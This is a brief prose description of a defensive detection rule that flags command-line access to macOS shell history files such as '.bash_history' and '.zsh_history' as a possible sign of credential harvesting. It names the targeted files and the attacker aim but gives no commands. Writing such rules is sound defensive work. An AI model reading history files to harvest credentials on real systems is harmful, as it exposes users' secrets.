This detection rule is designed to identify suspicious command-line operations performed on shell history files within macOS environments. Shell history files, such as '.bash_history', '.zsh_history', and others, record user commands, making them attractive targets for malicious actors looking to harvest credentials or manipulate their actions. The detection mechanism focuses on monitoring the command line for specific keyword patterns that correspond to common shell history file names. When such operations are detected, it indicates potential misuse of administrative privileges or unauthorized access, thus warranting further investigation. The rule incorporates filters to reduce false positive alerts that may arise from legitimate administrative tasks or users cleaning their history files. This proactive approach assists security teams in recognizing and responding to possible credential access attempts, contributing to the overall integrity of macOS systems.